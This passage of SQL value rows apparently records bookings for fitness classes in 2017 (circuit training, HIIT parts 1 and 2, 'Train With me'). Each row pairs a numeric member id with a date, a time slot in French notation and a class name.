(10541, 264, 'CTR', '2017-09-25', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10540, 264, 'CTR', '2017-09-25', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10555, 231, 'CTR', '2017-10-02', '17h30', '18h00', 'Circuit Training'),
(10538, 230, 'CTR', '2017-09-29', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10537, 132, 'CTR', '2017-09-22', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10536, 191, 'CTR', '2017-09-21', '18h45', '19h15', 'Circuit Training'),
(10535, 180, 'CTR', '2017-09-22', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10546, 105, 'CTR', '2017-09-28', '18h45', '19h15', 'Circuit Training'),
(10547, 205, 'CTR', '2017-09-28', '18h45', '19h15', 'Circuit Training'),
(10533, 48, 'CTR', '2017-09-22', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10532, 90, 'CTR', '2017-09-27', '20h30', '21h00', 'Circuit training'),
(10531, 80, 'CTR', '2017-09-27', '20h30', '21h00', 'Circuit training'),
(10530, 165, 'CTR', '2017-09-27', '20h30', '21h00', 'Circuit training'),
(10584, 48, 'CTR', '2017-09-29', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10582, 31, 'CTR', '2017-09-27', '18h45', '19h15', 'Circuit training'),
(10527, 138, 'CTR', '2017-09-27', '18h45', '19h15', 'Circuit training'),
(10526, 92, 'CTR', '2017-09-27', '18h45', '19h15', 'Circuit training'),
(10525, 280, 'CTR', '2017-09-27', '18h45', '19h15', 'Circuit training'),
(10524, 195, 'CTR', '2017-09-27', '18h45', '19h15', 'Circuit training'),
(10523, 247, 'CTR', '2017-09-27', '18h45', '19h15', 'Circuit training'),
(10522, 318, 'CTR', '2017-09-27', '18h45', '19h15', 'Circuit training'),
(10521, 310, 'CTR', '2017-09-27', '18h45', '19h15', 'Circuit training'),
(10594, 188, 'CTR', '2017-10-04', '17h15', '18h00', 'Circuit Training'),
(10693, 31, 'CTR', '2017-10-06', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10518, 296, 'CTR', '2017-09-27', '18h00', '18h30', 'Circuit Training'),
(10595, 188, 'CTR', '2017-10-04', '17h15', '18h00', 'Circuit Training'),
(10585, 324, 'CTR', '2017-09-27', '18h00', '18h30', 'Circuit Training'),
(10515, 314, 'CTR', '2017-09-27', '18h00', '18h30', 'Circuit Training'),
(10588, 180, 'CTR', '2017-09-29', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10513, 180, 'CTR', '2017-09-27', '17h15', '18h00', 'Circuit Training'),
(10512, 205, 'CTR', '2017-09-21', '18h45', '19h15', 'Circuit Training'),
(10511, 188, 'CTR', '2017-09-27', '17h15', '18h00', 'Circuit Training'),
(10589, 309, 'CTR', '2017-10-03', '18h15', '18h45', 'Circuit Training'),
(10590, 294, 'CTR', '2017-10-03', '18h15', '18h45', 'Circuit Training'),
(10504, 294, 'CTR', '2017-09-29', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10503, 309, 'CTR', '2017-09-27', '20h30', '21h00', 'Circuit training'),
(10502, 294, 'CTR', '2017-09-27', '20h30', '21h00', 'Circuit training'),
(10501, 210, 'CTR', '2017-09-20', '18h00', '18h30', 'Circuit Training'),
(10500, 308, 'CTR', '2017-09-21', '18h45', '19h15', 'Circuit Training'),
(10552, 260, 'CTR', '2017-10-02', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10545, 322, 'CTR', '2017-09-28', '18h45', '19h15', 'Circuit Training'),
(10508, 205, 'CTR', '2017-09-20', '18h45', '19h15', 'Circuit training'),
(10494, 300, 'CTR', '2017-10-02', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10493, 300, 'CTR', '2017-10-02', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10492, 300, 'CTR', '2017-09-25', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10491, 300, 'CTR', '2017-09-25', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10510, 188, 'CTR', '2017-09-27', '17h15', '18h00', 'Circuit Training'),
(10489, 80, 'CTR', '2017-09-14', '18h45', '19h15', 'Circuit Training'),
(10488, 80, 'CTR', '2017-09-14', '18h45', '19h15', 'Circuit Training'),
(10497, 311, 'CTR', '2017-09-20', '18h00', '18h30', 'Circuit Training'),
(10487, 205, 'CTR', '2017-09-14', '18h45', '19h15', 'Circuit Training'),
(10485, 80, 'CTR', '2017-09-14', '18h45', '19h15', 'Circuit Training'),
(10484, 105, 'CTR', '2017-09-14', '18h45', '19h15', 'Circuit Training'),
(10483, 309, 'CTR', '2017-09-22', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10482, 126, 'CTR', '2017-09-20', '17h15', '18h00', 'Circuit Training'),
(10481, 188, 'CTR', '2017-09-20', '17h15', '18h00', 'Circuit Training'),
(10480, 188, 'CTR', '2017-09-20', '17h15', '18h00', 'Circuit Training'),
(10479, 316, 'CTR', '2017-09-20', '17h15', '18h00', 'Circuit Training'),
(10506, 80, 'CTR', '2017-09-20', '18h00', '18h30', 'Circuit Training'),
(10507, 80, 'CTR', '2017-09-20', '18h00', '18h30', 'Circuit Training'),
(10476, 313, 'CTR', '2017-09-20', '18h00', '18h30', 'Circuit Training'),
(10475, 296, 'CTR', '2017-09-20', '18h00', '18h30', 'Circuit Training'),
(10474, 314, 'CTR', '2017-09-20', '18h00', '18h30', 'Circuit Training'),
(10473, 138, 'CTR', '2017-09-20', '18h45', '19h15', 'Circuit training'),
(10472, 195, 'CTR', '2017-09-20', '18h45', '19h15', 'Circuit training'),
(10471, 31, 'CTR', '2017-09-20', '18h45', '19h15', 'Circuit training'),
(10470, 48, 'CTR', '2017-09-20', '18h45', '19h15', 'Circuit training'),
(10469, 298, 'CTR', '2017-09-20', '18h45', '19h15', 'Circuit training'),
(10468, 92, 'CTR', '2017-09-20', '18h45', '19h15', 'Circuit training'),
(10467, 318, 'CTR', '2017-09-20', '18h45', '19h15', 'Circuit training'),
(10509, 316, 'CTR', '2017-09-27', '17h15', '18h00', 'Circuit Training'),
(10465, 173, 'CTR', '2017-09-20', '18h45', '19h15', 'Circuit training'),
(10464, 310, 'CTR', '2017-09-20', '18h45', '19h15', 'Circuit training'),
(10463, 309, 'CTR', '2017-09-20', '20h30', '21h00', 'Circuit training'),
(10462, 132, 'CTR', '2017-09-20', '20h30', '21h00', 'Circuit training'),
(10461, 80, 'CTR', '2017-09-20', '20h30', '21h00', 'Circuit training'),
(10458, 294, 'CTR', '2017-09-22', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10454, 126, 'CTR', '2017-09-13', '18h00', '18h30', 'Circuit Training'),
(10453, 278, 'CTR', '2017-09-13', '18h00', '18h30', 'Circuit Training'),
(10397, 294, 'CTR', '2017-09-13', '20h30', '21h00', 'Circuit training'),
(10396, 230, 'CTR', '2017-09-08', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10395, 132, 'CTR', '2017-09-08', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10413, 132, 'CTR', '2017-10-02', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10393, 241, 'CTR', '2017-09-13', '18h00', '18h30', 'Circuit Training'),
(10392, 298, 'CTR', '2017-09-13', '20h30', '21h00', 'Circuit training'),
(10391, 205, 'CTR', '2017-09-13', '20h30', '21h00', 'Circuit training'),
(10390, 132, 'CTR', '2017-09-13', '20h30', '21h00', 'Circuit training'),
(10389, 90, 'CTR', '2017-09-13', '20h30', '21h00', 'Circuit training'),
(10388, 318, 'CTR', '2017-09-13', '18h45', '19h15', 'Circuit training'),
(10387, 138, 'CTR', '2017-09-13', '18h45', '19h15', 'Circuit training'),
(10459, 165, 'CTR', '2017-09-20', '20h30', '21h00', 'Circuit training'),
(10385, 230, 'CTR', '2017-09-13', '18h45', '19h15', 'Circuit training'),
(10384, 310, 'CTR', '2017-09-13', '18h45', '19h15', 'Circuit training'),
(10383, 247, 'CTR', '2017-09-13', '18h45', '19h15', 'Circuit training'),
(10382, 173, 'CTR', '2017-09-13', '18h45', '19h15', 'Circuit training'),
(10381, 31, 'CTR', '2017-09-13', '18h45', '19h15', 'Circuit training'),
(10380, 48, 'CTR', '2017-09-13', '18h45', '19h15', 'Circuit training'),
(10379, 317, 'CTR', '2017-09-13', '18h00', '18h30', 'Circuit Training'),
(10378, 165, 'CTR', '2017-09-13', '18h00', '18h30', 'Circuit Training'),
(10452, 278, 'CTR', '2017-09-13', '17h15', '18h00', 'Circuit Training'),
(10412, 80, 'CTR', '2017-09-13', '20h30', '21h00', 'Circuit training'),
(10411, 314, 'CTR', '2017-09-13', '18h00', '18h30', 'Circuit Training'),
(10374, 313, 'CTR', '2017-09-13', '18h00', '18h30', 'Circuit Training'),
(10373, 177, 'CTR', '2017-09-13', '18h00', '18h30', 'Circuit Training'),
(10460, 90, 'CTR', '2017-09-20', '20h30', '21h00', 'Circuit training'),
(10371, 180, 'CTR', '2017-09-13', '17h15', '18h00', 'Circuit Training'),
(10370, 188, 'CTR', '2017-09-13', '17h15', '18h00', 'Circuit Training'),
(10365, 278, 'CTR', '2017-09-07', '18h45', '19h15', 'Circuit Training'),
(10366, 80, 'CTR', '2017-09-06', '18h00', '18h30', 'Circuit Training'),
(10362, 80, 'CTR', '2017-09-06', '18h00', '18h30', 'Circuit Training'),
(10361, 261, 'CTR', '2017-09-06', '18h00', '18h30', 'Circuit Training'),
(10360, 279, 'CTR', '2017-09-06', '17h15', '18h00', 'Circuit Training'),
(10359, 210, 'CTR', '2017-09-06', '20h30', '21h00', 'Circuit training'),
(10358, 280, 'CTR', '2017-09-06', '20h30', '21h00', 'Circuit training'),
(10357, 231, 'CTR', '2017-09-06', '18h45', '19h15', 'Circuit training'),
(10356, 316, 'CTR', '2017-09-06', '17h15', '18h00', 'Circuit Training'),
(10355, 303, 'CTR', '2017-09-11', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10354, 303, 'CTR', '2017-09-11', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10353, 265, 'CTR', '2017-09-11', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10352, 265, 'CTR', '2017-09-11', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10351, 297, 'CTR', '2017-09-11', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10350, 297, 'CTR', '2017-09-11', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10349, 281, 'CTR', '2017-09-11', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10348, 281, 'CTR', '2017-09-11', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10347, 306, 'CTR', '2017-09-11', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10346, 306, 'CTR', '2017-09-11', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10345, 301, 'CTR', '2017-09-11', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10344, 301, 'CTR', '2017-09-11', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10343, 298, 'CTR', '2017-09-11', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10342, 298, 'CTR', '2017-09-11', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10341, 280, 'CTR', '2017-09-11', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10340, 280, 'CTR', '2017-09-11', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10339, 302, 'CTR', '2017-09-11', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10338, 302, 'CTR', '2017-09-11', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10405, 92, 'CTR', '2017-09-13', '20h30', '21h00', 'Circuit training'),
(10404, 195, 'CTR', '2017-09-13', '18h45', '19h15', 'Circuit training'),
(10367, 316, 'CTR', '2017-09-13', '17h15', '18h00', 'Circuit Training'),
(10457, 294, 'CTR', '2017-09-20', '20h30', '21h00', 'Circuit training'),
(10333, 279, 'CTR', '2017-09-11', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10332, 279, 'CTR', '2017-09-11', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10331, 305, 'CTR', '2017-09-11', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10330, 305, 'CTR', '2017-09-11', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10329, 307, 'CTR', '2017-09-11', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10300, 296, 'CTR', '2017-09-06', '18h00', '18h30', 'Circuit Training'),
(10328, 307, 'CTR', '2017-09-11', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10327, 48, 'CTR', '2017-09-11', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10326, 48, 'CTR', '2017-09-11', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10325, 299, 'CTR', '2017-09-11', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10324, 299, 'CTR', '2017-09-11', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10323, 92, 'CTR', '2017-09-11', '17h30', '18h00', 'Circuit Training'),
(10322, 138, 'CTR', '2017-09-11', '17h30', '18h00', 'Circuit Training'),
(10321, 231, 'CTR', '2017-09-11', '17h30', '18h00', 'Circuit Training'),
(10320, 312, 'CTR', '2017-09-11', '17h30', '18h00', 'Circuit Training'),
(10319, 205, 'CTR', '2017-09-11', '17h30', '18h00', 'Circuit Training'),
(10364, 278, 'CTR', '2017-09-07', '18h00', '18h30', 'Circuit training'),
(10316, 80, 'CTR', '2017-09-06', '18h45', '19h15', 'Circuit training'),
(10315, 180, 'CTR', '2017-09-06', '17h15', '18h00', 'Circuit Training'),
(10308, 165, 'CTR', '2017-09-06', '20h30', '21h00', 'Circuit training'),
(10307, 304, 'CTR', '2017-09-04', '17h30', '18h00', 'Circuit Training'),
(10311, 132, 'CTR', '2017-09-11', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10305, 205, 'CTR', '2017-09-07', '18h45', '19h15', 'Circuit Training'),
(10304, 205, 'CTR', '2017-09-06', '20h30', '21h00', 'Circuit training'),
(10303, 205, 'CTR', '2017-09-04', '17h30', '18h00', 'Circuit Training'),
(10302, 313, 'CTR', '2017-09-06', '18h00', '18h30', 'Circuit Training'),
(10310, 132, 'CTR', '2017-09-11', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10299, 241, 'CTR', '2017-09-06', '18h00', '18h30', 'Circuit Training'),
(10298, 312, 'CTR', '2017-09-04', '17h30', '18h00', 'Circuit Training'),
(10297, 177, 'CTR', '2017-09-06', '18h00', '18h30', 'Circuit Training'),
(10318, 304, 'CTR', '2017-09-11', '17h30', '18h00', 'Circuit Training'),
(10293, 309, 'CTR', '2017-09-05', '18h30', '19h00', 'Circuit Training'),
(10292, 173, 'CTR', '2017-09-06', '18h45', '19h15', 'Circuit training'),
(10291, 90, 'CTR', '2017-09-06', '20h30', '21h00', 'Circuit training'),
(10290, 132, 'CTR', '2017-09-06', '20h30', '21h00', 'Circuit training'),
(10289, 138, 'CTR', '2017-09-06', '18h45', '19h15', 'Circuit training'),
(10288, 230, 'CTR', '2017-09-06', '18h45', '19h15', 'Circuit training'),
(10287, 31, 'CTR', '2017-09-06', '18h45', '19h15', 'Circuit training'),
(10286, 48, 'CTR', '2017-09-06', '18h45', '19h15', 'Circuit training'),
(10285, 231, 'CTR', '2017-09-04', '17h30', '18h00', 'Circuit Training'),
(10284, 138, 'CTR', '2017-09-04', '17h30', '18h00', 'Circuit Training'),
(10449, 306, 'CTR', '2017-09-25', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10281, 294, 'CTR', '2017-09-07', '18h00', '18h30', 'Circuit training'),
(10280, 294, 'CTR', '2017-09-05', '18h30', '19h00', 'Circuit Training'),
(10456, 140, 'CTR', '2017-09-13', '18h00', '18h30', 'Circuit Training'),
(10275, 132, 'CTR', '2017-09-04', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10274, 307, 'CTR', '2017-09-04', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10273, 307, 'CTR', '2017-09-04', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10270, 303, 'CTR', '2017-09-04', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10269, 303, 'CTR', '2017-09-04', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10268, 302, 'CTR', '2017-09-04', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10267, 302, 'CTR', '2017-09-04', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10448, 306, 'CTR', '2017-09-25', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10265, 279, 'CTR', '2017-09-04', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10272, 180, 'CTR', '2017-09-04', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10271, 180, 'CTR', '2017-09-04', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10257, 298, 'CTR', '2017-09-04', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10256, 298, 'CTR', '2017-09-04', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10255, 280, 'CTR', '2017-09-04', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10254, 280, 'CTR', '2017-09-04', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10253, 297, 'CTR', '2017-09-04', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10252, 297, 'CTR', '2017-09-04', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10251, 265, 'CTR', '2017-09-04', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10250, 265, 'CTR', '2017-09-04', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10249, 281, 'CTR', '2017-09-04', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10248, 281, 'CTR', '2017-09-04', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10247, 306, 'CTR', '2017-09-04', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10246, 306, 'CTR', '2017-09-04', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10245, 301, 'CTR', '2017-09-04', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10244, 301, 'CTR', '2017-09-04', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10243, 300, 'CTR', '2017-09-04', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10242, 300, 'CTR', '2017-09-04', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10369, 188, 'CTR', '2017-09-13', '17h15', '18h00', 'Circuit Training'),
(10314, 188, 'CTR', '2017-09-06', '17h15', '18h00', 'Circuit Training'),
(10240, 260, 'CTR', '2017-09-04', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10444, 297, 'CTR', '2017-09-25', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10262, 132, 'CTR', '2017-09-04', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10237, 305, 'CTR', '2017-09-04', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10236, 305, 'CTR', '2017-09-04', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10309, 308, 'CTR', '2017-09-08', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10233, 48, 'CTR', '2017-09-04', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10232, 48, 'CTR', '2017-09-04', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10231, 299, 'CTR', '2017-09-04', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10230, 299, 'CTR', '2017-09-04', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10446, 301, 'CTR', '2017-09-25', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10294, 247, 'CTR', '2017-09-06', '18h45', '19h15', 'Circuit training'),
(10295, 310, 'CTR', '2017-09-06', '18h45', '19h15', 'Circuit training'),
(10227, 260, 'CTR', '2017-09-04', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10312, 188, 'CTR', '2017-09-06', '17h15', '18h00', 'Circuit Training'),
(10445, 297, 'CTR', '2017-09-25', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10264, 279, 'CTR', '2017-09-04', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10443, 265, 'CTR', '2017-09-25', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10433, 317, 'CTR', '2017-09-25', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10432, 317, 'CTR', '2017-09-25', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10423, 299, 'CTR', '2017-09-25', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10424, 279, 'CTR', '2017-09-25', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10425, 279, 'CTR', '2017-09-25', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10426, 305, 'CTR', '2017-09-25', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10427, 305, 'CTR', '2017-09-25', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10553, 260, 'CTR', '2017-10-02', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10554, 92, 'CTR', '2017-10-02', '17h30', '18h00', 'Circuit Training'),
(10430, 48, 'CTR', '2017-09-25', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10431, 48, 'CTR', '2017-09-25', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10415, 92, 'CTR', '2017-09-25', '17h30', '18h00', 'Circuit Training'),
(10414, 132, 'CTR', '2017-10-02', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10400, 317, 'CTR', '2017-09-11', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10401, 317, 'CTR', '2017-09-11', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10409, 264, 'CTR', '2017-09-11', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10403, 309, 'CTR', '2017-09-13', '20h30', '21h00', 'Circuit training'),
(10406, 280, 'CTR', '2017-09-13', '20h30', '21h00', 'Circuit training'),
(10496, 260, 'CTR', '2017-09-25', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10495, 260, 'CTR', '2017-09-25', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10410, 264, 'CTR', '2017-09-11', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10416, 231, 'CTR', '2017-09-25', '17h30', '18h00', 'Circuit Training'),
(10417, 255, 'CTR', '2017-09-25', '17h30', '18h00', 'Circuit Training'),
(10418, 312, 'CTR', '2017-09-25', '17h30', '18h00', 'Circuit Training'),
(10419, 205, 'CTR', '2017-09-25', '17h30', '18h00', 'Circuit Training'),
(10420, 304, 'CTR', '2017-09-25', '17h30', '18h00', 'Circuit Training'),
(10421, 138, 'CTR', '2017-09-25', '17h30', '18h00', 'Circuit Training'),
(10031, 132, 'CTR', '2017-07-03', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10447, 301, 'CTR', '2017-09-25', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10016, 255, 'CTR', '2017-07-03', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(10441, 281, 'CTR', '2017-09-25', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10440, 281, 'CTR', '2017-09-25', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10422, 299, 'CTR', '2017-09-25', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10030, 132, 'CTR', '2017-07-03', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10550, 292, 'CTR', '2017-09-25', '17h30', '18h00', 'Circuit Training'),
(10551, 308, 'CTR', '2017-09-29', '18h30', '19h15', 'Train With me (Entraine toi avec moi)'),
(10436, 302, 'CTR', '2017-09-25', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10437, 302, 'CTR', '2017-09-25', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10438, 303, 'CTR', '2017-09-25', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10439, 303, 'CTR', '2017-09-25', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10180, 180, 'CTR', '2017-08-23', '18h15', '18h45', 'Circuit Training'),
(10179, 48, 'CTR', '2017-08-23', '18h15', '18h45', 'Circuit Training'),
(10178, 278, 'CTR', '2017-08-23', '18h15', '18h45', 'Circuit Training'),
(10177, 278, 'CTR', '2017-08-23', '18h15', '18h45', 'Circuit Training'),
(10175, 132, 'CTR', '2017-08-23', '18h15', '18h45', 'Circuit Training'),
(10176, 279, 'CTR', '2017-08-23', '18h15', '18h45', 'Circuit Training'),
(10170, 80, 'CTR', '2017-08-09', '18h15', '18h45', 'Circuit Training'),
(10174, 31, 'CTR', '2017-08-23', '18h15', '18h45', 'Circuit Training'),
(10168, 294, 'CTR', '2017-08-09', '18h15', '18h45', 'Circuit Training'),
(10150, 286, 'CTR', '2017-07-26', '18h15', '18h45', 'Circuit Training'),
(10154, 205, 'CTR', '2017-07-26', '19h ', '19h30', 'Circuit training'),
(10155, 193, 'CTR', '2017-08-02', '18h15', '18h45', 'Circuit Training'),
(10156, 31, 'CTR', '2017-08-02', '18h15', '18h45', 'Circuit Training'),
(10157, 205, 'CTR', '2017-08-02', '18h15', '18h45', 'Circuit Training'),
(10442, 265, 'CTR', '2017-09-25', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10166, 193, 'CTR', '2017-08-09', '18h15', '18h45', 'Circuit Training'),
(10163, 296, 'CTR', '2017-08-02', '18h15', '18h45', 'Circuit Training'),
(10162, 80, 'CTR', '2017-08-02', '18h15', '18h45', 'Circuit Training'),
(10161, 48, 'CTR', '2017-08-02', '18h15', '18h45', 'Circuit Training'),
(10160, 294, 'CTR', '2017-08-02', '18h15', '18h45', 'Circuit Training'),
(10159, 210, 'CTR', '2017-08-02', '19h ', '19h30', 'Circuit training'),
(10164, 231, 'CTR', '2017-08-02', '18h15', '18h45', 'Circuit Training'),
(10165, 132, 'CTR', '2017-08-09', '18h15', '18h45', 'Circuit Training'),
(10153, 205, 'CTR', '2017-07-26', '18h15', '18h45', 'Circuit Training'),
(10149, 287, 'CTR', '2017-07-26', '18h15', '18h45', 'Circuit Training'),
(10148, 31, 'CTR', '2017-07-26', '18h15', '18h45', 'Circuit Training'),
(10147, 193, 'CTR', '2017-07-26', '19h ', '19h30', 'Circuit training'),
(10146, 193, 'CTR', '2017-07-26', '18h15', '18h45', 'Circuit Training'),
(10152, 210, 'CTR', '2017-07-26', '19h ', '19h30', 'Circuit training'),
(10142, 132, 'CTR', '2017-07-26', '18h15', '18h45', 'Circuit Training'),
(10143, 279, 'CTR', '2017-07-26', '18h15', '18h45', 'Circuit Training'),
(10035, 48, 'CTR', '2017-07-03', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10036, 48, 'CTR', '2017-07-03', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10037, 260, 'CTR', '2017-07-03', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10038, 260, 'CTR', '2017-07-03', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10039, 265, 'CTR', '2017-07-03', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10040, 265, 'CTR', '2017-07-03', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10067, 80, 'CTR', '2017-07-03', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10064, 205, 'CTR', '2017-07-03', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(10043, 231, 'CTR', '2017-07-03', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(10066, 293, 'CTR', '2017-07-03', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10065, 293, 'CTR', '2017-07-03', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10046, 281, 'CTR', '2017-07-03', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10047, 281, 'CTR', '2017-07-03', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10048, 288, 'CTR', '2017-07-03', '19h30', '20h00', 'HIIT Partie 1 (avec cardio)'),
(10049, 288, 'CTR', '2017-07-03', '20h00', '20h30', 'HIIT Partie 2 (avec cardio)'),
(10050, 286, 'CTR', '2017-07-03', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10051, 286, 'CTR', '2017-07-03', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10052, 290, 'CTR', '2017-07-03', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(10053, 290, 'CTR', '2017-07-03', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(10054, 26, 'CTR', '2017-07-03', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
